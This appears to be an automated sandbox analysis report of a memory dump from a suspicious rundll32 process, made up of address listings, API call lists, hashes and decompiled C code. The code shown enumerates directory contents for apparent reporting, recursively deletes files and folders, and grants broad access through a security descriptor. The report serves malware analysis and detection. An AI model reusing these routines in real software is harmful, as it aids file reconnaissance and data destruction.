                                                            0x0463ca42
                                                            0x0463ca4a
                                                            0x00000000
                                                            0x0463ca50
                                                            0x0463ca54
                                                            0x0463ca59
                                                            0x0463ca5b
                                                            0x0463ca61
                                                            0x00000000
                                                            0x0463ca67
                                                            0x0463ca67
                                                            0x0463ca70
                                                            0x0463ca71
                                                            0x0463ca76
                                                            0x00000000
                                                            0x0463ca78
                                                            0x0463ca86
                                                            0x0463ca86
                                                            0x00000000
                                                            0x0463ca76
                                                            0x0463ca8c
                                                            0x0463ca8f
                                                            0x0463ca95
                                                            0x0463ca95
                                                            0x0463ca97
                                                            0x00000000
                                                            0x0463ca9d
                                                            0x0463ca9d
                                                            0x0463ca9f
                                                            0x00000000
                                                            0x0463caa5
                                                            0x0463caa5
                                                            0x0463caab
                                                            0x0463caac
                                                            0x0463caad
                                                            0x0463cab0
                                                            0x0463cc85
                                                            0x0463cc88
                                                            0x00000000
                                                            0x0463cc8e
                                                            0x0463cc8e
                                                            0x0463cc94
                                                            0x0463cc97
                                                            0x00000000
                                                            0x0463cc99
                                                            0x0463cc99
                                                            0x0463cc9c
                                                            0x0463cd58
                                                            0x0463cd5b
                                                            0x00000000
                                                            0x0463cd61
                                                            0x0463cd61
                                                            0x0463cd68
                                                            0x0463cd6b
                                                            0x0463cd72
                                                            0x0463cd72
                                                            0x0463cd74
                                                            0x0463cd74
                                                            0x0463cd74
                                                            0x0463cd76
                                                            0x0463cd76
                                                            0x0463cd7c
                                                            0x0463cd80
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cd82
                                                            0x0463cd83
                                                            0x0463cd86
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cd86
                                                            0x0463cd88
                                                            0x0463cd8b
                                                            0x0463cda8
                                                            0x0463cda8
                                                            0x0463cdaa
                                                            0x00000000
                                                            0x0463cdac
                                                            0x0463cdc1
                                                            0x0463cdc4
                                                            0x0463cdcc
                                                            0x0463cdd6
                                                            0x0463cdd6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cd8d
                                                            0x0463cd8d
                                                            0x0463cd8e
                                                            0x0463cd8e
                                                            0x0463cd98
                                                            0x0463cda2
                                                            0x0463cda2
                                                            0x0463cca2
                                                            0x0463cca2
                                                            0x0463cca4
                                                            0x0463ccab
                                                            0x0463ccb1
                                                            0x0463ccb4
                                                            0x0463ccbb
                                                            0x0463ccbb
                                                            0x0463ccbd
                                                            0x0463ccc1
                                                            0x0463ccc1
                                                            0x0463ccc1
                                                            0x0463ccc3
                                                            0x0463ccc3
                                                            0x0463ccc9
                                                            0x0463cccd
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cccf
                                                            0x0463ccd0
                                                            0x0463ccd3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463ccd3
                                                            0x0463ccd5
                                                            0x0463ccd8
                                                            0x0463cce4
                                                            0x0463cce4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cce6
                                                            0x0463cce6
                                                            0x0463cce8
                                                            0x0463cd2b
                                                            0x0463cd40
                                                            0x0463cd43
                                                            0x0463cd4b
                                                            0x0463cd55
                                                            0x0463ccea
                                                            0x0463ccf0
                                                            0x0463ccf2
                                                            0x0463ccf2
                                                            0x0463ccf5
                                                            0x0463ccf5
                                                            0x0463ccf7
                                                            0x0463cd00
                                                            0x0463cd00
                                                            0x0463cd06
                                                            0x0463cd0a
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cd0c
                                                            0x0463cd0d
                                                            0x0463cd10
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cd10
                                                            0x0463cd12
                                                            0x0463cd15
                                                            0x0463cd21
                                                            0x0463cd21
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cd23
                                                            0x0463cd23
                                                            0x0463cd25
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cd17
                                                            0x0463cd17
                                                            0x0463cd18
                                                            0x0463cd18
                                                            0x00000000
                                                            0x0463cd1c
                                                            0x00000000
                                                            0x0463ccda
                                                            0x0463ccda
                                                            0x0463ccdb
                                                            0x0463ccdb
                                                            0x00000000
                                                            0x0463ccdf
                                                            0x0463cc9c
                                                            0x0463cc97
                                                            0x0463cab6
                                                            0x0463cab6
                                                            0x0463cabd
                                                            0x0463cdfb
                                                            0x00000000
                                                            0x0463cac3
                                                            0x0463cac3
                                                            0x0463cac9
                                                            0x0463cacf
                                                            0x0463cbda
                                                            0x0463cbdf
                                                            0x0463cc2c
                                                            0x0463cc32
                                                            0x00000000
                                                            0x0463cc38
                                                            0x0463cc38
                                                            0x0463cc38
                                                            0x0463cc3f
                                                            0x0463cc42
                                                            0x0463cc48
                                                            0x0463cc48
                                                            0x0463cc4a
                                                            0x0463cc50
                                                            0x0463cc50
                                                            0x0463cc50
                                                            0x0463cc52
                                                            0x0463cc52
                                                            0x0463cc58
                                                            0x0463cc5c
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cc5e
                                                            0x0463cc5f
                                                            0x0463cc62
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cc62
                                                            0x0463cc64
                                                            0x0463cc67
                                                            0x0463cdd9
                                                            0x0463cdd9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cc6d
                                                            0x0463cc6d
                                                            0x0463cc6e
                                                            0x0463cc6e
                                                            0x0463cc78
                                                            0x0463cc82
                                                            0x0463cc82
                                                            0x0463cbe1
                                                            0x0463cbe1
                                                            0x0463cbe8
                                                            0x0463cbeb
                                                            0x0463cbf1
                                                            0x0463cbf1
                                                            0x0463cbf3
                                                            0x0463cbf3
                                                            0x0463cbf3
                                                            0x0463cbf5
                                                            0x0463cbf5
                                                            0x0463cbfb
                                                            0x0463cbff
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cc01
                                                            0x0463cc02
                                                            0x0463cc05
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cc05
                                                            0x0463cc07
                                                            0x0463cc0a
                                                            0x0463cc24
                                                            0x0463cddc
                                                            0x0463cddc
                                                            0x0463cddc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cc0c
                                                            0x0463cc0c
                                                            0x0463cc0d
                                                            0x0463cc0d
                                                            0x0463cc17
                                                            0x0463cc21
                                                            0x0463cc21
                                                            0x0463cad5
                                                            0x0463cad5
                                                            0x0463cadc
                                                            0x0463cadf
                                                            0x0463cae5
                                                            0x0463caec
                                                            0x0463caf2
                                                            0x0463caf9
                                                            0x0463caff
                                                            0x0463cb03
                                                            0x0463cb0d
                                                            0x0463cb13
                                                            0x0463cb24
                                                            0x0463cb2a
                                                            0x0463cb34
                                                            0x0463cb34
                                                            0x0463cb2c
                                                            0x0463cb2c
                                                            0x0463cb32
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cb32
                                                            0x0463cb15
                                                            0x0463cb15
                                                            0x0463cb18
                                                            0x0463cb18
                                                            0x0463cb40
                                                            0x0463cb42
                                                            0x0463cb42
                                                            0x0463cb45
                                                            0x0463cb48
                                                            0x0463cb48
                                                            0x0463cb4a
                                                            0x0463cb50
                                                            0x0463cb50
                                                            0x0463cb56
                                                            0x0463cb59
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cb5b
                                                            0x0463cb5c
                                                            0x0463cb5f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cb5f
                                                            0x0463cb61
                                                            0x0463cb64
                                                            0x0463cb76
                                                            0x0463cb76
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cb78
                                                            0x0463cb78
                                                            0x0463cb7a
                                                            0x0463cde0
                                                            0x0463cdf4
                                                            0x0463cdf9
                                                            0x0463cb80
                                                            0x0463cb80
                                                            0x0463cb86
                                                            0x0463cb94
                                                            0x0463cb97
                                                            0x0463cb9a
                                                            0x0463cba0
                                                            0x0463cba0
                                                            0x0463cba0
                                                            0x0463cba2
                                                            0x0463cba2
                                                            0x0463cba8
                                                            0x0463cbac
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cbae
                                                            0x0463cbaf
                                                            0x0463cbb2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cbb2
                                                            0x0463cbb4
                                                            0x0463cbb7
                                                            0x0463cbcb
                                                            0x0463cbcd
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cdde
                                                            0x0463cdde
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463cbb9
                                                            0x0463cbb9
                                                            0x0463cbba
                                                            0x0463cbba
                                                            0x0463cbbe
                                                            0x0463cbc1
                                                            0x00000000
                                                            0x0463cbc1
                                                            0x0463cb86
                                                            0x00000000
                                                            0x0463cb66
                                                            0x0463cb66
                                                            0x0463cb67
                                                            0x0463cb67
                                                            0x0463cb6c
                                                            0x00000000
                                                            0x0463cb6c
                                                            0x0463cacf
                                                            0x0463cabd
                                                            0x0463cab0
                                                            0x0463ca9f
                                                            0x0463ca97
                                                            0x0463ca61
                                                            0x0463ca4a
                                                            0x0463ca2b
                                                            0x0463ca1a
                                                            0x0463c9f0
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll,00000000), ref: 0463C9E6
                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0463CA12
                                                            • VirtualAlloc.KERNEL32(00000000,00000050,00003000,00000004,?,74CB43E0), ref: 0463CDEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressAllocHandleModuleProcVirtual
                                                            • String ID: .$Pjj$RtlGetVersion$j$ntdll
                                                            • API String ID: 3695083113-758095414
                                                            • Opcode ID: a1d0dc90d3eb7a1983d006851aa84237ddbd55341b3932762793dd085f3569b8
                                                            • Instruction ID: 8ff76876c04858b1f89ab4720dd547c2a885db59d2c917fd8bc04264492b428b
                                                            • Opcode Fuzzy Hash: a1d0dc90d3eb7a1983d006851aa84237ddbd55341b3932762793dd085f3569b8
                                                            • Instruction Fuzzy Hash: FCC10673A001988BDB28DF58C8947BDBBA0FF55311F2101AEE9567B381FA317946DB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E04634C20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				short _v1056;
                                                            				intOrPtr _v1624;
                                                            				struct _WIN32_FIND_DATAW _v1648;
                                                            				char _v1649;
                                                            				long _v1656;
                                                            				void* _v1660;
                                                            				intOrPtr _v1664;
                                                            				signed int _t47;
                                                            				void* _t54;
                                                            				signed int _t56;
                                                            				signed int _t57;
                                                            				signed int _t66;
                                                            				signed int _t67;
                                                            				intOrPtr _t83;
                                                            				void* _t84;
                                                            				intOrPtr _t85;
                                                            				intOrPtr* _t87;
                                                            				void* _t95;
                                                            				intOrPtr _t96;
                                                            				intOrPtr _t97;
                                                            				intOrPtr _t98;
                                                            				void* _t100;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            				long _t104;
                                                            				void* _t106;
                                                            				signed int _t107;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            
                                                            				_t85 = __ecx;
                                                            				_t47 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t47 ^ _t107;
                                                            				_t83 = __ecx;
                                                            				_t104 = 0x2800;
                                                            				_v1664 = __ecx;
                                                            				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                                            				_v1656 = 0x2800;
                                                            				wsprintfW( &_v1056, L"%s\\*.*", _a4);
                                                            				_t109 = _t108 + 0xc;
                                                            				_t54 = FindFirstFileW( &_v1056,  &_v1648);
                                                            				_v1660 = _t54;
                                                            				if(_t54 != 0xffffffff) {
                                                            					_t84 = LocalAlloc(0x40, 0x2800);
                                                            					_t100 = 1;
                                                            					 *_t84 = 0x69;
                                                            					do {
                                                            						_t14 = _t104 - 0x410; // 0x23f0
                                                            						if(_t100 > _t14) {
                                                            							_t104 = _t104 + 0x410;
                                                            							_v1656 = _t104;
                                                            							_t84 = LocalReAlloc(_t84, _t104, 0x42);
                                                            						}
                                                            						_t87 = ".";
                                                            						_t56 =  &(_v1648.cFileName);
                                                            						while(1) {
                                                            							_t95 =  *_t56;
                                                            							if(_t95 !=  *_t87) {
                                                            								break;
                                                            							}
                                                            							if(_t95 == 0) {
                                                            								L10:
                                                            								_t57 = 0;
                                                            							} else {
                                                            								_t98 =  *((intOrPtr*)(_t56 + 2));
                                                            								_t18 = _t87 + 2; // 0x2e0000
                                                            								if(_t98 !=  *_t18) {
                                                            									break;
                                                            								} else {
                                                            									_t56 = _t56 + 4;
                                                            									_t87 = _t87 + 4;
                                                            									if(_t98 != 0) {
                                                            										continue;
                                                            									} else {
                                                            										goto L10;
                                                            									}
                                                            								}
                                                            							}
                                                            							L12:
                                                            							if(_t57 != 0) {
                                                            								_t66 = L"..";
                                                            								_t87 =  &(_v1648.cFileName);
                                                            								while(1) {
                                                            									_t96 =  *_t87;
                                                            									if(_t96 !=  *_t66) {
                                                            										break;
                                                            									}
                                                            									if(_t96 == 0) {
                                                            										L18:
                                                            										_t67 = 0;
                                                            									} else {
                                                            										_t97 =  *((intOrPtr*)(_t87 + 2));
                                                            										_t21 = _t66 + 2; // 0x2e
                                                            										if(_t97 !=  *_t21) {
                                                            											break;
                                                            										} else {
                                                            											_t87 = _t87 + 4;
                                                            											_t66 = _t66 + 4;
                                                            											if(_t97 != 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L18;
                                                            											}
                                                            										}
                                                            									}
                                                            									L20:
                                                            									if(_t67 != 0) {
                                                            										 *(_t100 + _t84) = _v1648.dwFileAttributes & 0x00000010;
                                                            										_t101 = _t100 + 1;
                                                            										_t106 = 2 + lstrlenW( &(_v1648.cFileName)) * 2;
                                                            										E0465E060(_t101 + _t84,  &(_v1648.cFileName), _t106);
                                                            										_t102 = _t101 + _t106;
                                                            										_t104 = _v1656;
                                                            										_t109 = _t109 + 0xc;
                                                            										 *((intOrPtr*)(_t102 + _t84)) = _v1648.nFileSizeHigh;
                                                            										 *((intOrPtr*)(_t102 + _t84 + 4)) = _v1648.nFileSizeLow;
                                                            										 *((intOrPtr*)(_t102 + _t84 + 8)) = _v1648.ftLastWriteTime;
                                                            										 *((intOrPtr*)(_t102 + _t84 + 0xc)) = _v1624;
                                                            										_t100 = _t102 + 0x10;
                                                            									}
                                                            									goto L22;
                                                            								}
                                                            								asm("sbb eax, eax");
                                                            								_t67 = _t66 | 0x00000001;
                                                            								goto L20;
                                                            							}
                                                            							goto L22;
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t57 = _t56 | 0x00000001;
                                                            						goto L12;
                                                            						L22:
                                                            					} while (FindNextFileW(_v1660,  &_v1648) != 0);
                                                            					_push(_t87);
                                                            					_push(0x3f);
                                                            					_push(_t100);
                                                            					E04631C60( *((intOrPtr*)(_v1664 + 4)));
                                                            					LocalFree(_t84);
                                                            					FindClose(_v1660);
                                                            					return E04655AFE(_v12 ^ _t107, _t84);
                                                            				} else {
                                                            					_push(_t85);
                                                            					_push(0x3f);
                                                            					_push(1);
                                                            					_v1649 = 0x69;
                                                            					E04631C60( *((intOrPtr*)(_t83 + 4)));
                                                            					return E04655AFE(_v12 ^ _t107,  &_v1649);
                                                            				}
                                                            			}

































                                                            0x04634c20
                                                            0x04634c29
                                                            0x04634c30
                                                            0x04634c3a
                                                            0x04634c47
                                                            0x04634c4c
                                                            0x04634c53
                                                            0x04634c5a
                                                            0x04634c60
                                                            0x04634c66
                                                            0x04634c77
                                                            0x04634c7d
                                                            0x04634c86
                                                            0x04634cc3
                                                            0x04634cc5
                                                            0x04634cca
                                                            0x04634cd0
                                                            0x04634cd0
                                                            0x04634cd8
                                                            0x04634cda
                                                            0x04634ce4
                                                            0x04634cf0
                                                            0x04634cf0
                                                            0x04634cf2
                                                            0x04634cf7
                                                            0x04634d00
                                                            0x04634d00
                                                            0x04634d06
                                                            0x00000000
                                                            0x00000000
                                                            0x04634d0b
                                                            0x04634d22
                                                            0x04634d22
                                                            0x04634d0d
                                                            0x04634d0d
                                                            0x04634d11
                                                            0x04634d15
                                                            0x00000000
                                                            0x04634d17
                                                            0x04634d17
                                                            0x04634d1a
                                                            0x04634d20
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04634d20
                                                            0x04634d15
                                                            0x04634d2b
                                                            0x04634d2d
                                                            0x04634d33
                                                            0x04634d38
                                                            0x04634d40
                                                            0x04634d40
                                                            0x04634d46
                                                            0x00000000
                                                            0x00000000
                                                            0x04634d4b
                                                            0x04634d62
                                                            0x04634d62
                                                            0x04634d4d
                                                            0x04634d4d
                                                            0x04634d51
                                                            0x04634d55
                                                            0x00000000
                                                            0x04634d57
                                                            0x04634d57
                                                            0x04634d5a
                                                            0x04634d60
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04634d60
                                                            0x04634d55
                                                            0x04634d6b
                                                            0x04634d6d
                                                            0x04634d77
                                                            0x04634d81
                                                            0x04634d88
                                                            0x04634d9b
                                                            0x04634da6
                                                            0x04634da8
                                                            0x04634dae
                                                            0x04634db1
                                                            0x04634dba
                                                            0x04634dc4
                                                            0x04634dce
                                                            0x04634dd2
                                                            0x04634dd2
                                                            0x00000000
                                                            0x04634d6d
                                                            0x04634d66
                                                            0x04634d68
                                                            0x00000000
                                                            0x04634d68
                                                            0x00000000
                                                            0x04634d2d
                                                            0x04634d26
                                                            0x04634d28
                                                            0x00000000
                                                            0x04634dd5
                                                            0x04634de8
                                                            0x04634df0
                                                            0x04634df7
                                                            0x04634df9
                                                            0x04634dfe
                                                            0x04634e06
                                                            0x04634e12
                                                            0x04634e2a
                                                            0x04634c88
                                                            0x04634c88
                                                            0x04634c92
                                                            0x04634c94
                                                            0x04634c97
                                                            0x04634c9e
                                                            0x04634cb3
                                                            0x04634cb3

                                                            APIs
                                                            • wsprintfW.USER32 ref: 04634C60
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 04634C77
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 04634CBD
                                                            • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04634CEA
                                                            • lstrlenW.KERNEL32(?), ref: 04634D82
                                                            • FindNextFileW.KERNEL32(?,?), ref: 04634DE2
                                                            • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F), ref: 04634E06
                                                            • FindClose.KERNEL32(?), ref: 04634E12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocal$AllocFile$CloseFirstFreeNextlstrlenwsprintf
                                                            • String ID: %s\*.*$i
                                                            • API String ID: 4084865168-1236837797
                                                            • Opcode ID: 5f81c4c8cabfb8ce687aa6a28195922ee7c5c30ef6711d5cff2ce118030d079a
                                                            • Instruction ID: 22ca6763072a7d19bf4688b25589d5bbcc64fe6e36b4d41a2297bff148ed69e2
                                                            • Opcode Fuzzy Hash: 5f81c4c8cabfb8ce687aa6a28195922ee7c5c30ef6711d5cff2ce118030d079a
                                                            • Instruction Fuzzy Hash: B351F571A00118ABDB20DF24DC84BEAB7BAEF64715F4041A5E50DD7241FB36AA90CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E04634E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, WCHAR* _a4) {
                                                            				signed int _v12;
                                                            				short _v1056;
                                                            				short _v2096;
                                                            				struct _WIN32_FIND_DATAW _v2688;
                                                            				intOrPtr _v2692;
                                                            				signed int _t26;
                                                            				signed int _t33;
                                                            				signed int _t34;
                                                            				signed int _t41;
                                                            				signed int _t42;
                                                            				void* _t54;
                                                            				intOrPtr* _t56;
                                                            				intOrPtr* _t59;
                                                            				void* _t63;
                                                            				void* _t64;
                                                            				intOrPtr _t65;
                                                            				intOrPtr _t66;
                                                            				void* _t68;
                                                            				WCHAR* _t70;
                                                            				signed int _t71;
                                                            				void* _t72;
                                                            				void* _t73;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t26 ^ _t71;
                                                            				_t70 = _a4;
                                                            				_t68 = wsprintfW;
                                                            				_v2692 = __ecx;
                                                            				wsprintfW( &_v2096, L"%s\\*.*", _t70);
                                                            				_t73 = _t72 + 0xc;
                                                            				_t54 = FindFirstFileW( &_v2096,  &_v2688);
                                                            				if(_t54 != 0xffffffff) {
                                                            					do {
                                                            						_t56 = ".";
                                                            						_t33 =  &(_v2688.cFileName);
                                                            						while(1) {
                                                            							_t63 =  *_t33;
                                                            							if(_t63 !=  *_t56) {
                                                            								break;
                                                            							}
                                                            							if(_t63 == 0) {
                                                            								L7:
                                                            								_t34 = 0;
                                                            							} else {
                                                            								_t66 =  *((intOrPtr*)(_t33 + 2));
                                                            								_t10 = _t56 + 2; // 0x2e0000
                                                            								if(_t66 !=  *_t10) {
                                                            									break;
                                                            								} else {
                                                            									_t33 = _t33 + 4;
                                                            									_t56 = _t56 + 4;
                                                            									if(_t66 != 0) {
                                                            										continue;
                                                            									} else {
                                                            										goto L7;
                                                            									}
                                                            								}
                                                            							}
                                                            							L9:
                                                            							if(_t34 != 0) {
                                                            								_t59 = L"..";
                                                            								_t41 =  &(_v2688.cFileName);
                                                            								while(1) {
                                                            									_t64 =  *_t41;
                                                            									if(_t64 !=  *_t59) {
                                                            										break;
                                                            									}
                                                            									if(_t64 == 0) {
                                                            										L15:
                                                            										_t42 = 0;
                                                            									} else {
                                                            										_t65 =  *((intOrPtr*)(_t41 + 2));
                                                            										_t13 = _t59 + 2; // 0x2e
                                                            										if(_t65 !=  *_t13) {
                                                            											break;
                                                            										} else {
                                                            											_t41 = _t41 + 4;
                                                            											_t59 = _t59 + 4;
                                                            											if(_t65 != 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L15;
                                                            											}
                                                            										}
                                                            									}
                                                            									L17:
                                                            									if(_t42 != 0) {
                                                            										_push( &(_v2688.cFileName));
                                                            										_push(_t70);
                                                            										_push(L"%s\\%s");
                                                            										_push( &_v1056);
                                                            										if((_v2688.dwFileAttributes & 0x00000010) == 0) {
                                                            											wsprintfW();
                                                            											_t73 = _t73 + 0x10;
                                                            											DeleteFileW( &_v1056);
                                                            										} else {
                                                            											wsprintfW();
                                                            											_t73 = _t73 + 0x10;
                                                            											E04634E30(_t54, _v2692, _t68, _t70,  &_v1056);
                                                            										}
                                                            									}
                                                            									goto L21;
                                                            								}
                                                            								asm("sbb eax, eax");
                                                            								_t42 = _t41 | 0x00000001;
                                                            								goto L17;
                                                            							}
                                                            							goto L21;
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t34 = _t33 | 0x00000001;
                                                            						goto L9;
                                                            						L21:
                                                            					} while (FindNextFileW(_t54,  &_v2688) != 0);
                                                            					FindClose(_t54);
                                                            					RemoveDirectoryW(_t70);
                                                            					return E04655AFE(_v12 ^ _t71);
                                                            				} else {
                                                            					return E04655AFE(_v12 ^ _t71);
                                                            				}
                                                            			}

























                                                            0x04634e39
                                                            0x04634e40
                                                            0x04634e45
                                                            0x04634e4f
                                                            0x04634e5c
                                                            0x04634e62
                                                            0x04634e64
                                                            0x04634e7b
                                                            0x04634e80
                                                            0x04634ea0
                                                            0x04634ea0
                                                            0x04634ea5
                                                            0x04634eb0
                                                            0x04634eb0
                                                            0x04634eb6
                                                            0x00000000
                                                            0x00000000
                                                            0x04634ebb
                                                            0x04634ed2
                                                            0x04634ed2
                                                            0x04634ebd
                                                            0x04634ebd
                                                            0x04634ec1
                                                            0x04634ec5
                                                            0x00000000
                                                            0x04634ec7
                                                            0x04634ec7
                                                            0x04634eca
                                                            0x04634ed0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04634ed0
                                                            0x04634ec5
                                                            0x04634edb
                                                            0x04634edd
                                                            0x04634ee3
                                                            0x04634ee8
                                                            0x04634ef0
                                                            0x04634ef0
                                                            0x04634ef6
                                                            0x00000000
                                                            0x00000000
                                                            0x04634efb
                                                            0x04634f12
                                                            0x04634f12
                                                            0x04634efd
                                                            0x04634efd
                                                            0x04634f01
                                                            0x04634f05
                                                            0x00000000
                                                            0x04634f07
                                                            0x04634f07
                                                            0x04634f0a
                                                            0x04634f10
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04634f10
                                                            0x04634f05
                                                            0x04634f1b
                                                            0x04634f1d
                                                            0x04634f2c
                                                            0x04634f2d
                                                            0x04634f34
                                                            0x04634f39
                                                            0x04634f3a
                                                            0x04634f55
                                                            0x04634f57
                                                            0x04634f61
                                                            0x04634f3c
                                                            0x04634f3c
                                                            0x04634f4a
                                                            0x04634f4e
                                                            0x04634f4e
                                                            0x04634f3a
                                                            0x00000000
                                                            0x04634f1d
                                                            0x04634f16
                                                            0x04634f18
                                                            0x00000000
                                                            0x04634f18
                                                            0x00000000
                                                            0x04634edd
                                                            0x04634ed6
                                                            0x04634ed8
                                                            0x00000000
                                                            0x04634f67
                                                            0x04634f75
                                                            0x04634f7e
                                                            0x04634f85
                                                            0x04634fa0
                                                            0x04634e82
                                                            0x04634e94
                                                            0x04634e94

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2470771279-1665845743
                                                            • Opcode ID: f74fba9e2bdca98d4cc5e31ab7cb31f4714c052cfbefd706b458252e08fd835e
                                                            • Instruction ID: 77df285a332173d350ebfe75680efaa7b8c9c629960bb7c67fa1aa4ded346699
                                                            • Opcode Fuzzy Hash: f74fba9e2bdca98d4cc5e31ab7cb31f4714c052cfbefd706b458252e08fd835e
                                                            • Instruction Fuzzy Hash: 5641F6716002189ADB10AF74DC44AFAB3BDEF65325F4544A9D90AD3205FF32FA84CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E0463AE60(void* __ebx, void* __edi, void* __esi, struct _SECURITY_DESCRIPTOR* _a4) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                            				void* _v20;
                                                            				struct _SECURITY_DESCRIPTOR* _v24;
                                                            				signed int _t16;
                                                            				struct _SECURITY_DESCRIPTOR* _t18;
                                                            				void* _t20;
                                                            				long _t38;
                                                            				long _t46;
                                                            				void* _t48;
                                                            				signed int _t49;
                                                            
                                                            				_t16 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t16 ^ _t49;
                                                            				_t18 = _a4;
                                                            				_t48 = 0;
                                                            				_v24 = _t18;
                                                            				_v20 = 0;
                                                            				_t46 = 0;
                                                            				_v16.Value = 0;
                                                            				_v12 = 0x100;
                                                            				if(InitializeSecurityDescriptor(_t18, 1) != 0 && AllocateAndInitializeSid( &_v16, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
                                                            					_t10 = GetLengthSid(_v20) + 0x10; // 0x10
                                                            					_t38 = _t10;
                                                            					_t48 = RtlAllocateHeap(GetProcessHeap(), 8, _t38);
                                                            					if(_t48 != 0 && InitializeAcl(_t48, _t38, 2) != 0 && AddAccessAllowedAce(_t48, 2, 0x10000000, _v20) != 0) {
                                                            						SetSecurityDescriptorDacl(_v24, 1, _t48, 0);
                                                            						_t46 =  !=  ? 1 : 0;
                                                            					}
                                                            				}
                                                            				_t20 = _v20;
                                                            				if(_t20 != 0) {
                                                            					FreeSid(_t20);
                                                            				}
                                                            				if(_t46 != 0) {
                                                            					return E04655AFE(_v8 ^ _t49);
                                                            				} else {
                                                            					if(_t48 != 0) {
                                                            						HeapFree(GetProcessHeap(), _t46, _t48);
                                                            					}
                                                            					return E04655AFE(_v8 ^ _t49);
                                                            				}
                                                            			}















                                                            0x0463ae66
                                                            0x0463ae6d
                                                            0x0463ae70
                                                            0x0463ae77
                                                            0x0463ae79
                                                            0x0463ae7d
                                                            0x0463ae84
                                                            0x0463ae86
                                                            0x0463ae89
                                                            0x0463ae97
                                                            0x0463aebf
                                                            0x0463aebf
                                                            0x0463aed2
                                                            0x0463aed6
                                                            0x0463af02
                                                            0x0463af0f
                                                            0x0463af0f
                                                            0x0463af12
                                                            0x0463af13
                                                            0x0463af18
